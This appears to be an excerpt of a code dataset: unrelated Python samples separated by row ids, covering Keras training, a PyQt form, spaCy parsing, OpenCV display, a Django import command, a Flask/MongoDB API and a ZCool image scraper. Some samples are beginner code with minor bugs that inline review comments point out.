        for e in range(nb_epoch):
            print '-'*40
            print 'Epoch', e
            print '-'*40
            print "Training..."
            # batch train with realtime data augmentation
            progbar = generic_utils.Progbar(X_train.shape[0])
            for X_batch, Y_batch in datagen.flow(X_train, Y_train):
                loss = model.train(X_batch, Y_batch)
                progbar.add(X_batch.shape[0], values=[("train loss", loss)])
            print "Testing..."
            # test time!
            progbar = generic_utils.Progbar(X_test.shape[0])
            pred = model.predict_classes(X_test, batch_size=batch_size)
            score = np_utils.accuracy(pred, Y_test)
            # Keep the best (epoch, score) pair seen so far.
            best_epoch, best_score = (best_epoch, best_score) if best_score >= score else (e, score)
            print 'Score: ', score
            print 'Best: ', best_score, ' at epoch: ', best_epoch
            #for X_batch, Y_batch in datagen.flow(X_test, Y_test):
            #score = model.test(X_batch, Y_batch)
            #progbar.add(X_batch.shape[0], values=[("test loss", score)])
    # NOTE(review): best_epoch/best_score are only defined on the augmented
    # branch; with data_augmentation=False this line raises NameError.
    all_time_best.append((best_epoch, best_score))
from multiprocessing import Pool
# Train the ten 10-class slices in parallel worker processes.
pool = Pool(processes=7)
pool.map(train_data, xrange(10))
# NOTE(review): all_time_best is appended *inside the worker processes*, so
# the parent's list stays empty and this loop likely prints nothing.
# Returning results from train_data via pool.map would fix it -- confirm.
for epoch, score in all_time_best:
    print 'At: ', epoch, ', best score: ', score
#for ds_idx in xrange(10):
#train_data(ds_idx)
# the data, shuffled and split between tran and test sets
#(X_train, y_train), (X_test, y_test) = cifar100.load_data(test_split=0.15)
#train_idx = np.where((y_train >= ds_idx * 10) & (y_train < (1 + ds_idx) * 10))[0]
#test_idx = np.where((y_test >= ds_idx * 10) & (y_test < (1 + ds_idx) * 10))[0]
#X_train = np.array([X_train[i] for i in train_idx])
#y_train = np.array([y_train[i] for i in train_idx])
#X_test = np.array([X_test[i] for i in test_idx])
#y_test = np.array([y_test[i] for i in test_idx])
#print X_train.shape[0], 'train samples'
#print X_test.shape[0], 'test samples'
#y_train -= ds_idx * 10
#y_test -= ds_idx * 10
## convert class vectors to binary class matrices
#Y_train = np_utils.to_categorical(y_train, nb_classes)
#Y_test = np_utils.to_categorical(y_test, nb_classes)
#model = Sequential()
#model.add(Convolution2D(32, 3, 3, 3, border_mode='full'))
#model.add(Activation('relu'))
#model.add(Dropout(0.8))
#model.add(Convolution2D(32, 32, 3, 3))
#model.add(Activation('relu'))
#model.add(MaxPooling2D(poolsize=(2, 2)))
#model.add(Dropout(0.75))
#model.add(Convolution2D(64, 32, 3, 3, border_mode='full'))
#model.add(Activation('relu'))
#model.add(Dropout(0.7))
#model.add(Convolution2D(64, 64, 3, 3))
#model.add(Activation('relu'))
#model.add(MaxPooling2D(poolsize=(2, 2)))
#model.add(Dropout(0.6))
#model.add(Flatten(64*8*8))
#model.add(Dense(64*8*8, 512, init='normal'))
#model.add(Activation('relu'))
#model.add(Dropout(0.5))
#model.add(Dense(512, nb_classes, init='normal'))
#model.add(Activation('softmax'))
## let's train the model using SGD + momentum (how original).
#sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
#model.compile(loss='categorical_crossentropy', optimizer=sgd)
#if not data_augmentation:
#print "Not using data augmentation or normalization"
#X_train = X_train.astype("float32")
#X_test = X_test.astype("float32")
#X_train /= 255
#X_test /= 255
#model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=10)
#score = model.evaluate(X_test, Y_test, batch_size=batch_size)
#print 'Test score:', score
#else:
#print "Using real time data augmentation"
## this will do preprocessing and realtime data augmentation
#datagen = ImageDataGenerator(
#featurewise_center=True, # set input mean to 0 over the dataset
#samplewise_center=False, # set each sample mean to 0
#featurewise_std_normalization=True, # divide inputs by std of the dataset
#samplewise_std_normalization=False, # divide each input by its std
#zca_whitening=False, # apply ZCA whitening
#rotation_range=20, # randomly rotate images in the range (degrees, 0 to 180)
#width_shift_range=0.3, # randomly shift images horizontally (fraction of total width)
#height_shift_range=0.3, # randomly shift images vertically (fraction of total height)
#horizontal_flip=True, # randomly flip images
#vertical_flip=False) # randomly flip images
## compute quantities required for featurewise normalization
## (std, mean, and principal components if ZCA whitening is applied)
#datagen.fit(X_train)
#best_score = 0.0
#best_epoch = 0
#for e in range(nb_epoch):
#print '-'*40
#print 'Epoch', e
#print '-'*40
#print "Training..."
## batch train with realtime data augmentation
#progbar = generic_utils.Progbar(X_train.shape[0])
#for X_batch, Y_batch in datagen.flow(X_train, Y_train):
#loss = model.train(X_batch, Y_batch)
#progbar.add(X_batch.shape[0], values=[("train loss", loss)])
#print "Testing..."
## test time!
#progbar = generic_utils.Progbar(X_test.shape[0])
#pred = model.predict_classes(X_test, batch_size=batch_size)
#score = np_utils.accuracy(pred, Y_test)
#best_epoch, best_score = (best_epoch, best_score) if best_score >= score else (e, score)
#print 'Score: ', score
#print 'Best: ', best_score, ' at epoch: ', best_epoch
##for X_batch, Y_batch in datagen.flow(X_test, Y_test):
##score = model.test(X_batch, Y_batch)
##progbar.add(X_batch.shape[0], values=[("test loss", score)])
#all_time_best.append((best_epoch, best_score))
#for epoch, score in all_time_best:
#print 'At: ', epoch, ', best score: ', score
|
10,585 | 4adedc5898d0a564fe8f496534bad29146607fd4 | #Given a string, print the string capitalized.
string = raw_input("what's the string?")
string_cap = string.capitalize()
print string_cap
|
10,586 | 6dad01f9b94866a2ec394208eec8cbffcbc563f3 | import sys
from PyQt5.QtWidgets import QApplication , QWidget, QPushButton, QTableWidgetItem
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import pyqtSlot
from PyQt5.QtWidgets import QHBoxLayout, QGroupBox , QDialog, QVBoxLayout, QGridLayout
from PyQt5.QtWidgets import QLabel, QTextEdit
from PyQt5.QtWidgets import QMessageBox
from PyQt5.QtWidgets import QFormLayout, QLineEdit
from PyQt5.QtWidgets import QSizePolicy, QMainWindow
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
import matplotlib.pyplot as plt
from PyQt5.QtCore import Qt
from validator.StudentValidator import StudentValidator
from dao.StudentDAOSqliteImpl import StudentDAOSqliteImpl
from model.Student import Student
class StudentSaveWindow(QDialog):
    """
    Modal QDialog for adding a new model.Student into the database and,
    on success, appending the new row to the caller's QTableWidget.
    """
    def __init__(self, tableWidget):
        """
        constructor
        :param tableWidget: QTableWidget to append the saved student to
        """
        super().__init__()
        self.tableWidget = tableWidget
        self.title = "Save New Student"
        self.left, self.top, self.width, self.height = 10, 10, 500, 500
        self.validator = StudentValidator()
        self.dao = StudentDAOSqliteImpl()
        self.initGUI()
    def initGUI(self):
        """
        Initializes window geometry, modality, widgets and signal wiring.
        :return: None
        """
        self.setWindowTitle(self.title)
        self.setGeometry(self.left, self.top, self.width, self.height)
        # Block interaction with the rest of the application while open.
        self.setWindowModality(Qt.ApplicationModal)
        self.addComponents()
        self.registerEvents()
    def addComponents(self):
        """
        Sets the form layout for this dialog and adds all input rows into it.
        :return: None
        """
        self.mainLayout = QFormLayout()
        self.setLayout(self.mainLayout)
        # title
        self.lblTitle = QLabel("Save New Student")
        self.lblEmpty = QLabel()
        # enrolmentNumber
        self.lblEnrolmentNumber = QLabel("EnrolmentNumber: ")
        self.editEnrolmentNumber = QLineEdit()
        # firstName
        self.lblFirstName = QLabel("FirstName: ")
        self.editFirstName = QLineEdit()
        # lastName
        self.lblLastName = QLabel("LastName: ")
        self.editLastName = QLineEdit()
        # dob
        self.lblDob = QLabel("DateOfBirth: ")
        self.editDob = QLineEdit()
        # faculty
        self.lblFaculty = QLabel("Faculty: ")
        self.editFaculty = QLineEdit()
        # email
        self.lblEmail = QLabel("Email: ")
        self.editEmail = QLineEdit()
        # buttons
        self.btnSave = QPushButton("Save")
        self.btnCancel = QPushButton("Cancel")
        # add all rows to mainLayout
        self.mainLayout.addRow(self.lblEmpty, self.lblTitle)
        self.mainLayout.addRow(self.lblEnrolmentNumber, self.editEnrolmentNumber)
        self.mainLayout.addRow(self.lblFirstName, self.editFirstName)
        self.mainLayout.addRow(self.lblLastName, self.editLastName)
        self.mainLayout.addRow(self.lblDob, self.editDob)
        self.mainLayout.addRow(self.lblFaculty, self.editFaculty)
        self.mainLayout.addRow(self.lblEmail, self.editEmail)
        self.mainLayout.addRow(self.btnSave, self.btnCancel)
    def registerEvents(self):
        """
        Connects button signals to their slots.
        :return: None
        """
        self.btnSave.clicked.connect(self.onBtnSaveClicked)
        self.btnCancel.clicked.connect(self.onBtnCancelClicked)
    @pyqtSlot()
    def onBtnSaveClicked(self):
        """
        Slot invoked when btnSave is clicked: validates every field, persists
        the student via the DAO, appends a row to the table widget and closes
        the dialog.  Any validation or DAO error is shown in a message box.
        :return: None
        """
        try:
            errors = []
            enrolmentNumber = self.editEnrolmentNumber.text()
            firstName = self.editFirstName.text()
            lastName = self.editLastName.text()
            dob = self.editDob.text()
            faculty = self.editFaculty.text()
            email = self.editEmail.text()
            # Collect all validation failures so the user sees them at once.
            if not self.validator.validateEnrolmentNumber(enrolmentNumber):
                errors.append("enrolmentNumber is incorrect.")
            if not self.validator.validateFirstName(firstName):
                errors.append("firstName is incorrect.")
            if not self.validator.validateLastName(lastName):
                errors.append("lastName is incorrect.")
            if not self.validator.validateDob(dob):
                errors.append("DateOfBirth is incorrect.")
            if not self.validator.validateFaculty(faculty):
                errors.append("Faculty is incorrect.")
            if not self.validator.validateEmail(email):
                errors.append("Email is incorrect.")
            if len(errors) > 0:
                raise Exception("\n".join(errors))
            # dao.save returns a truthy error message on failure -- TODO confirm.
            ret = self.dao.save(Student(enrolmentNumber, firstName, lastName,
                                        dob, faculty, email))
            if ret:
                raise Exception(ret)
            # Mirror the saved student as a new row in the caller's table.
            rowPosition = self.tableWidget.rowCount()
            self.tableWidget.insertRow(rowPosition)
            self.tableWidget.setItem(rowPosition, 0, QTableWidgetItem(enrolmentNumber))
            self.tableWidget.setItem(rowPosition, 1, QTableWidgetItem(firstName))
            self.tableWidget.setItem(rowPosition, 2, QTableWidgetItem(lastName))
            self.tableWidget.setItem(rowPosition, 3, QTableWidgetItem(dob))
            self.tableWidget.setItem(rowPosition, 4, QTableWidgetItem(faculty))
            self.tableWidget.setItem(rowPosition, 5, QTableWidgetItem(email))
            self.close()
        except Exception as err:
            QMessageBox.critical(self, "<<Error>>", str(err))
    @pyqtSlot()
    def onBtnCancelClicked(self):
        """
        Slot invoked when btnCancel is clicked: closes the dialog unchanged.
        :return: None
        """
        self.close()
|
10,587 | 9beb996d4106e806f2cee8c0ee62faf28161a240 | import spacy
from spacy.tokens import Doc
from SubjectObjectExtractor import SubjectObjectExtractor
nlp = spacy.load("en_core_web_md")
pipeline_component = SubjectObjectExtractor(nlp)
# Allow adjectives to stand in as objects when extracting SVO triples.
pipeline_component.adj_as_object = True
# Register the custom Doc attribute the component fills in.
Doc.set_extension('svos', default=None)
nlp.add_pipe(pipeline_component, last=True)
# NOTE(review): the handle is never closed -- a `with open(...)` would be
# safer; left unchanged in this documentation-only pass.
file = open('test_text.txt', 'r')
i = 1
for line in file:
    print(i, line, end='')
    # Lines starting with '#' are treated as comments and not parsed.
    if not line.startswith('#'):
        doc = nlp(line)
        for svo in doc._.svos:
            print(' ', svo)
    i += 1
10,588 | 68b3754e602e5128448738bde8ebf35492b15455 | class Store:
_name = None
_realised = 0
_realisedsumm = 0
def __init__(self, name,):
self._name = name
def set_name(self, name):
self._name = name
def get_name(self):
return self._name
def set_realised(self, realised):
self._realised = realised
def get_realised(self):
return self._realised
def sell(self):
self._realised +=1
Store._realisedsumm += 1
def seesumm(self):
print(format.self._realised)
print(self.get_realisedsumm)
metro = Store("METPO")
metro.sell()          # one sale for this store (and the class-wide total)
metro.seesumm()
ashan = Store("ASHAN")
ashan.sell()
ashan.seesumm()
|
10,589 | b732b2ccfa7393e748a570626c6b236cfa70c938 | import cv2
def correlation(img):
    """Split a 3-channel image into its B, G, R planes and return them.

    FIX: the original computed cv2.split(img) and discarded the result
    (implicitly returning None).  Returning the tuple makes the work usable;
    existing callers that ignored the return value are unaffected.

    :param img: image as loaded by cv2.imread (channel order B, G, R)
    :returns: (img_B, img_G, img_R) channel arrays
    """
    (img_B, img_G, img_R) = cv2.split(img)
    return img_B, img_G, img_R
# Display images 1.jpg .. 10.jpg one at a time, resized to 128x128;
# each cv2.waitKey(0) blocks until a key is pressed before advancing.
for i in range(1, 11):
    img = cv2.imread(str(i) + ".jpg", cv2.IMREAD_COLOR)
    img = cv2.resize(img, dsize=(128, 128), interpolation=cv2.INTER_AREA)
    cv2.imshow("1", img)
    cv2.waitKey(0)
|
10,590 | 8c4f2ecfbc1fed057c65534003e3e3a63acfbd46 | #coding; utf-8
import urllib
import utility
def get_problem(id, status=None):
    """Fetch one AOJ problem (zero-padded 4-digit id) as a dict (Python 2)."""
    url = "http://judge.u-aizu.ac.jp/onlinejudge/webservice/problem";
    pram = {"id": "%04d" % id};
    # The status flag is only sent when explicitly requested.
    if (status):
        pram["status"] = status;
    pram_str = urllib.urlencode(pram);
    print pram_str
    return (utility.xml2dict(urllib.urlopen(url + "?" + pram_str).read()));
def get_solved_record(**kwargs):
    """Fetch solved-record entries from the AOJ web service as a dict."""
    base = "http://judge.u-aizu.ac.jp/onlinejudge/webservice/solved_record"
    query = urllib.urlencode(kwargs)
    return utility.xml2dict(urllib.urlopen(base + "?" + query).read())
def get_status_log(**kwargs):
    """Fetch the submission status log for a problem (id zero-padded) as a dict."""
    base = "http://judge.u-aizu.ac.jp/onlinejudge/webservice/status_log"
    params = dict(kwargs)
    params["problem_id"] = "%04d" % params["problem_id"]
    query = urllib.urlencode(params)
    return utility.xml2dict(urllib.urlopen(base + "?" + query).read())
if __name__ == "__main__":
    # Manual smoke test against the live AOJ web service.
    print get_solved_record(user_id="harekumo");
    print get_status_log(problem_id=0);
|
10,591 | ba77d62b4812b676e0d2227f0327e176ed6c9263 | op1=int(input('첫번째 수 입력:'))
op2=int(input('두번째 수 입력:'))
print(op1,'+',op2,'=',(op1+op2))
print(op1,'-',op2,'=',(op1-op2))
print(op1,'*',op2,'=',(op1*op2))
print(op1,'/',op2,'=',(op1/op2))
|
10,592 | d2de10264c96e44403a1c30d44d6d4b227f754ee | from django.core.exceptions import ObjectDoesNotExist
from django.core.management.base import NoArgsCommand
from django.utils.html import strip_tags
from datetime import time
import MySQLdb
from program.models import Show, Schedule, RRule
# Connection settings for the legacy MySQL programme database.
USER = 'helsinki'
PASSWD = 'helsinki'
DB = 'helsinki'
# Map the legacy integer rhythm code to RRule fixture rows (by primary key).
# The keys look like day intervals (0/7/14/28) -- TODO confirm against the
# RRule fixture data.
RRULES = {
    0: RRule.objects.get(pk=1),
    7: RRule.objects.get(pk=3),
    14: RRule.objects.get(pk=4),
    28: RRule.objects.get(pk=5)
}
class Command(NoArgsCommand):
    """Import broadcast schedules from the legacy MySQL programme database (Python 2)."""
    help = 'Import schedules from the current program'
    def handle_noargs(self, **options):
        """Copy all future schedules (originals first, then repetitions) into Django.

        Rows whose show cannot be matched by title, or whose rhythm code has
        no RRULES mapping, are reported and skipped.
        """
        connection = MySQLdb.connect(user=USER, passwd=PASSWD, db=DB)
        cursor = connection.cursor()
        # First pass: original broadcasts -- skip 'Musikprogramm' rows and
        # anything marked as a repetition.
        cursor.execute("""SELECT titel, beginn, ende, erster_termin, letzter_termin, rhytmus, termin
            FROM sendungen
            WHERE letzter_termin > current_date AND titel NOT LIKE 'Musikprogramm' AND titel NOT LIKE '%%(Wiederholung)'""")
        counter = 0
        for titel, beginn, ende, erster_termin, letzter_termin, rhytmus, termin in cursor.fetchall():
            titel = strip_tags(titel)
            # Convert the .seconds offsets of beginn/ende into time-of-day values.
            hours, seconds = divmod(beginn.seconds, 3600)
            minutes, seconds = divmod(seconds, 60)
            tstart = time(hour=hours, minute=minutes, second=seconds)
            hours, seconds = divmod(ende.seconds, 3600)
            minutes, seconds = divmod(seconds, 60)
            tend = time(hour=hours, minute=minutes, second=seconds)
            try:
                rrule = RRULES[rhytmus]
                try:
                    show = Show.objects.get(name=titel)
                except ObjectDoesNotExist:
                    print 'show with name "%s" not found' % titel
                else:
                    schedule = Schedule(rrule=rrule, byweekday=termin, show=show, dstart=erster_termin,
                                        tstart=tstart, tend=tend, until=letzter_termin)
                    try:
                        schedule.save()
                        counter += 1
                    except:
                        # NOTE(review): save failures are silently skipped --
                        # best-effort import by design, but consider logging.
                        pass
            except KeyError:
                print 'rhythmus "%i" is not supported for sendung "%s"' % (rhytmus, titel)
        # Second pass: repetition entries; strip the 15-character
        # " (Wiederholung)" suffix so the title matches the show name.
        cursor.execute("""SELECT titel, beginn, ende, erster_termin, letzter_termin, rhytmus, termin
            FROM sendungen
            WHERE letzter_termin > current_date AND titel LIKE '%%(Wiederholung)'""")
        for titel, beginn, ende, erster_termin, letzter_termin, rhytmus, termin in cursor.fetchall():
            titel = strip_tags(titel[:-15])
            hours, seconds = divmod(beginn.seconds, 3600)
            minutes, seconds = divmod(seconds, 60)
            tstart = time(hour=hours, minute=minutes, second=seconds)
            hours, seconds = divmod(ende.seconds, 3600)
            minutes, seconds = divmod(seconds, 60)
            tend = time(hour=hours, minute=minutes, second=seconds)
            try:
                rrule = RRULES[rhytmus]
                try:
                    show = Show.objects.get(name=titel)
                except ObjectDoesNotExist:
                    print 'show with name "%s" not found' % titel
                else:
                    schedule = Schedule(rrule=rrule, byweekday=termin, show=show, dstart=erster_termin,
                                        tstart=tstart, tend=tend, until=letzter_termin, is_repetition=True)
                    try:
                        schedule.save()
                        counter += 1
                    except:
                        pass
            except KeyError:
                print 'rhythmus "%i" is not supported for sendung "%s"' % (rhytmus, titel)
        cursor.close()
        connection.close()
        # counter accumulates over both passes.
        print '%i schedules imported' % counter
10,593 | fc04a89c4e21f90d0b6c52271424310c42a7ac0c | from flask import Blueprint, request, jsonify, make_response
from database.db import mongo
from bson import ObjectId
# create the blueprint to be registered in app.py
user = Blueprint("user", __name__)
@user.route("/api/user", methods=["POST"])
def create_user():
    """Create a user document from the JSON request body.

    Expects a JSON object with ``name``, ``age`` and ``address`` keys
    (missing keys are stored as null). Returns the new document's id with
    HTTP 201, or a 500 message when the insert yields no result.
    """
    payload = request.get_json()
    new_user = {field: payload.get(field) for field in ("name", "age", "address")}
    result = mongo.db.users.insert_one(new_user)
    if not result:
        return make_response("An error occurred when adding the new plan", 500)
    return make_response(str(result.inserted_id), 201)
@user.route("/api/user", methods=["GET"])
def get_all_users():
    """Return every user document as a JSON array with HTTP 200.

    Each entry carries the stringified ObjectId plus the stored fields.
    """
    user_list = mongo.db.users.find()
    data_to_return = []
    for user in user_list:
        data_to_return.append(
            {
                "id": str(user.get("_id")),
                "name": user.get("name"),
                "age": user.get("age"),
                "address": user.get("address"),
            }
        )
    # Bug fix: the status code belongs to make_response, not jsonify.
    # jsonify(data_to_return, 200) would serialize [data, 200] as the body.
    return make_response(jsonify(data_to_return), 200)
@user.route("/api/user/<string:user_id>", methods=["DELETE"])
def delete_user(user_id):
    """Delete the user whose ``_id`` matches the given ObjectId string.

    Returns 204 with an empty body on success, or 404 when no document
    matched the id.
    """
    outcome = mongo.db.users.delete_one({"_id": ObjectId(user_id)})
    if outcome.deleted_count != 1:
        return "No user found with this ID", 404
    return {}, 204
|
10,594 | 120f524168c1a648b054a421d3f7ac77d8070ad1 | # @Author: lonsty
# @Date: 2019-09-07 18:34:18
import json
import math
import os.path as op
import re
import sys
import threading
import time
from collections import namedtuple
from concurrent.futures import ThreadPoolExecutor, as_completed, wait
from datetime import datetime
from pathlib import Path
from queue import Empty, Queue
from typing import List
from urllib.parse import urljoin, urlparse
from uuid import uuid4
import requests
from bs4 import BeautifulSoup
from termcolor import colored, cprint
from zcooldl.utils import (mkdirs_if_not_exist, retry, safe_filename,
sort_records)
Scrapy = namedtuple('Scrapy', 'type author title objid index url')  # one download-task record
HEADERS = {
    'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 '
                  '(KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
}
# URL templates for the ZCool site and its JSON APIs
HOST_PAGE = 'https://www.zcool.com.cn'
SEARCH_DESIGNER_SUFFIX = '/search/designer?&word={word}'
USER_SUFFIX = '/u/{id}'
PAGE_SUFFIX = '?myCate=0&sort=1&p={page}'
WORK_SUFFIX = '/work/content/show?p=1&objectId={objid}'
COLLECTION_SUFFIX = '/collection/contents?id={objid}&p={page}&pageSize=25'
USER_API = 'https://www.zcool.com.cn/member/card/{id}'
TIMEOUT = 30  # per-request timeout, seconds
Q_TIMEOUT = 1  # queue.get timeout, seconds
MAX_WORKERS = 20  # default thread-pool size
RETRIES = 3  # default request retry count
thread_local = threading.local()  # holds one requests.Session per thread
def get_session():
    """Return this thread's requests.Session, creating it on first use.

    One session per thread reuses TCP connections, which cuts connection
    overhead for repeated requests.

    :return requests.Session: the thread-local session
    """
    session = getattr(thread_local, "session", None)
    if session is None:
        session = requests.Session()
        thread_local.session = session
    return session
@retry(Exception, tries=RETRIES)
def session_request(url: str, method: str = 'GET') -> requests.Response:
    """Request data through the thread-local session.

    Decorated with ``retry`` so network failures are retried.

    NOTE(review): ``tries=RETRIES`` is evaluated once at import time, so
    resetting the global RETRIES later (see ZCoolScraper.__init__) does not
    change the retry count of this function -- confirm intended.

    :param str url: target URL
    :param str method: HTTP method
    :return requests.Response: response object (raise_for_status applied)
    """
    resp = get_session().request(method, url, headers=HEADERS, timeout=TIMEOUT)
    resp.raise_for_status()
    return resp
class ZCoolScraper():
    """Scrape and download all images of a ZCool user or collection.

    Work flows through three queues (pages -> topics -> images) processed
    concurrently on one shared ThreadPoolExecutor; progress lines are printed
    from background threads. Successes/failures are tracked in ``self.stat``
    and can be saved to a JSON record file for later re-download.
    """

    def __init__(self, user_id=None, username=None, collection=None, destination=None,
                 max_pages=None, spec_topics=None, max_topics=None, max_workers=None,
                 retries=None, redownload=None, overwrite=False, thumbnail=False):
        """Initialize download parameters.

        :param int user_id: user ID
        :param str username: username
        :param HttpUrl collection: collection URL
        :param str destination: local directory for images, default current path
        :param int max_pages: maximum pages to scrape, default all
        :param list spec_topics: only download these specific topics
        :param int max_topics: maximum topics to download, default all
        :param int max_workers: number of threads, default 20
        :param int retries: retry count for failed requests, default 3
        :param str redownload: record file; if given, retry its failed entries
        :param bool overwrite: overwrite existing files, default False
        :param bool thumbnail: download thumbnails instead of originals, default False
        """
        self.start_time = datetime.now()
        print(f' - - - - - -+-+ {self.start_time.ctime()} +-+- - - - - -\n')
        self.collection = collection
        self.spec_topics = spec_topics
        self.max_topics = max_topics or 'all'
        self.max_workers = max_workers or MAX_WORKERS
        self.pool = ThreadPoolExecutor(self.max_workers)
        self.overwrite = overwrite
        self.thumbnail = thumbnail
        self.pages = Queue()
        self.topics = Queue()
        self.images = Queue()
        self.stat = {
            'npages': 0,
            'ntopics': 0,
            'nimages': 0,
            'pages_pass': set(),
            'pages_fail': set(),
            'topics_pass': set(),
            'topics_fail': set(),
            'images_pass': set(),
            'images_fail': set()
        }
        if retries:
            # reset the module-level RETRIES
            global RETRIES
            RETRIES = retries
        dest = Path(destination or '', urlparse(HOST_PAGE).netloc)
        # resume mode: re-download the failed items recorded in a record file
        if redownload:
            self.username = self.reload_records(redownload)
            self.user_id = self.search_id_by_username(self.username)
            self.max_pages = self.pages.qsize()
            self.max_topics = self.topics.qsize()
            self.directory = dest / safe_filename(self.username)
            self.stat.update({
                'npages': self.max_pages,
                'ntopics': self.max_topics,
                'nimages': self.images.qsize()
            })
            print(f'{"Username".rjust(17)}: {colored(self.username, "cyan")}\n'
                  f'{"User ID".rjust(17)}: {self.user_id}\n'
                  f'{"Pages to scrapy".rjust(17)}: {self.max_pages:2d}\n'
                  f'{"Topics to scrapy".rjust(17)}: {self.max_topics:3d}\n'
                  f'{"Images to scrapy".rjust(17)}: {self.images.qsize():4d}\n'
                  f'Storage directory: {colored(self.directory, attrs=["underline"])}', end='\n\n')
            self.fetch_all(initialized=True)
            return
        # collection mode: download everything in one collection
        if collection:
            objid = self.parse_objid(collection, is_collection=True)
            resp = session_request(urljoin(HOST_PAGE, COLLECTION_SUFFIX.format(objid=objid, page=1)))
            data = resp.json().get('data', {})
            total = data.get('total', 0)
            page_size = data.get('pageable', {}).get('pageSize')
            max_pages_ = math.ceil(total / page_size)
            self.max_pages = min(max_pages or 9999, max_pages_)
            self.directory = dest / safe_filename(f'{self.username}-{self._collection_name}')
            self.parse_collection_topics(data.get('content'))
            # parse topics from page 2 up to the last page into download tasks
            for page in range(2, self.max_pages + 1):
                resp = session_request(urljoin(HOST_PAGE, COLLECTION_SUFFIX.format(objid=objid, page=page)))
                self.parse_collection_topics(topics=resp.json().get('data', {}).get('content'),
                                             offset=page_size * (page - 1))
        # user mode: download by user ID or username
        else:
            self.user_id = user_id or self.search_id_by_username(username)
            self.base_url = urljoin(HOST_PAGE, USER_SUFFIX.format(id=self.user_id))
            try:
                response = session_request(self.base_url)
            except requests.exceptions.ProxyError:
                cprint('Cannot connect to proxy.', 'red')
                sys.exit(1)
            except Exception as e:
                cprint(f'Failed to connect to {self.base_url}, {e}', 'red')
                sys.exit(1)
            soup = BeautifulSoup(markup=response.text, features='html.parser')
            try:
                author = soup.find(name='div', id='body').get('data-name')
                if username and username != author:
                    cprint(f'Invalid user id:「{user_id}」or username:「{username}」!', 'red')
                    sys.exit(1)
                self.username = author
            except Exception:
                self.username = username or 'anonymous'
            self.directory = dest / safe_filename(self.username)
            try:
                # last-but-one pager link holds the total page count
                max_pages_ = int(soup.find(id='laypage_0').find_all(name='a')[-2].text)
            except Exception:
                max_pages_ = 1
            self.max_pages = min(max_pages or 9999, max_pages_)
            if self.spec_topics:
                topics = ', '.join(self.spec_topics)
            elif self.max_topics == 'all':
                topics = 'all'
            else:
                topics = self.max_pages * self.max_topics
            print(f'{"Username".rjust(17)}: {colored(self.username, "cyan")}\n'
                  f'{"User ID".rjust(17)}: {self.user_id}\n'
                  f'{"Maximum pages".rjust(17)}: {max_pages_}\n'
                  f'{"Pages to scrapy".rjust(17)}: {self.max_pages}\n'
                  f'{"Topics to scrapy".rjust(17)}: {topics}\n'
                  f'Storage directory: {colored(self.directory, attrs=["underline"])}', end='\n\n')
        self.END_PARSING_TOPICS = False
        self.fetch_all(initialized=True if self.collection else False)

    def search_id_by_username(self, username):
        """Look up a user ID by the user's nickname.

        :param str username: user nickname
        :return int: user ID
        """
        if not username:
            cprint('Must give an <user id> or <username>!', 'yellow')
            sys.exit(1)
        search_url = urljoin(HOST_PAGE, SEARCH_DESIGNER_SUFFIX.format(word=username))
        try:
            response = session_request(search_url)
        except requests.exceptions.ProxyError:
            cprint('Cannot connect to proxy.', 'red')
            sys.exit(1)
        except Exception as e:
            cprint(f'Failed to connect to {search_url}, {e}', 'red')
            sys.exit(1)
        author_1st = BeautifulSoup(response.text, 'html.parser').find(name='div', class_='author-info')
        if (not author_1st) or (author_1st.get('data-name') != username):
            cprint(f'Username「{username}」does not exist!', 'yellow')
            sys.exit(1)
        return author_1st.get('data-id')

    def reload_records(self, file):
        """Load the failed items from a local download-record file.

        NOTE(review): if the record's "fail" list is empty, ``scrapy`` is
        never bound and the final return raises UnboundLocalError -- confirm
        records always contain at least one failure when this path is used.

        :param str file: path of the download-record file
        :return str: username
        """
        with open(file, 'r', encoding='utf-8') as f:
            for fail in json.loads(f.read()).get('fail'):
                scrapy = Scrapy._make(fail.values())
                if scrapy.type == 'page':
                    self.pages.put(scrapy)
                elif scrapy.type == 'topic':
                    self.topics.put(scrapy)
                elif scrapy.type == 'image':
                    self.images.put(scrapy)
        return scrapy.author

    def generate_pages(self):
        """Generate homepage-scraping tasks, one per page up to max_pages."""
        for page in range(1, self.max_pages + 1):
            suffix = COLLECTION_SUFFIX if self.collection else PAGE_SUFFIX
            url = urljoin(self.base_url, suffix.format(page=page))
            scrapy = Scrapy(type='page', author=self.username, title=page,
                            objid=None, index=page - 1, url=url)
            if scrapy not in self.stat["pages_pass"]:
                self.pages.put(scrapy)

    def parse_collection_topics(self, topics: List[dict], offset: int = 0):
        """Queue topic tasks parsed from one page of a collection listing.

        :param topics: "content" entries from the collection API response
        :param offset: running index offset for entries on later pages
        """
        for idx, topic in enumerate(topics):
            new_scrapy = Scrapy(type='topic',
                                author=topic.get('creatorObj', {}).get('username'),
                                title=topic.get('title'),
                                objid=topic.get('id'),
                                index=offset + idx,
                                url=topic.get('pageUrl'))
            if new_scrapy not in self.stat["topics_pass"]:
                self.topics.put(new_scrapy)
                self.stat["ntopics"] += 1

    def parse_topics(self, scrapy):
        """Scrape one homepage, parse all topics on it, and queue
        topic-scraping tasks.

        :param scrapy: task record for the page
        :return Scrapy: the same task record
        """
        resp = session_request(scrapy.url)
        cards = BeautifulSoup(resp.text, 'html.parser').find_all(name='a', class_='card-img-hover')
        for idx, card in enumerate(cards if self.max_topics == 'all' else cards[:self.max_topics + 1]):
            title = card.get('title')
            if self.spec_topics and (title not in self.spec_topics):
                continue
            new_scrapy = Scrapy(type='topic', author=scrapy.author, title=title,
                                objid=None, index=idx, url=card.get('href'))
            if new_scrapy not in self.stat["topics_pass"]:
                self.topics.put(new_scrapy)
                self.stat["ntopics"] += 1
        return scrapy

    def fetch_topics(self):
        """Drain the page queue and resolve pages into topics on the pool."""
        page_futures = {}
        while True:
            try:
                scrapy = self.pages.get(timeout=Q_TIMEOUT)
                page_futures[self.pool.submit(self.parse_topics, scrapy)] = scrapy
            except Empty:
                break
            except Exception:
                continue
        for future in as_completed(page_futures):
            scrapy = page_futures.get(future)
            try:
                future.result()
                self.stat["pages_pass"].add(scrapy)
            except Exception:
                self.stat["pages_fail"].add(scrapy)
                cprint(f'GET page: {scrapy.title} ({scrapy.url}) failed.', 'red')
        self.END_PARSING_TOPICS = True

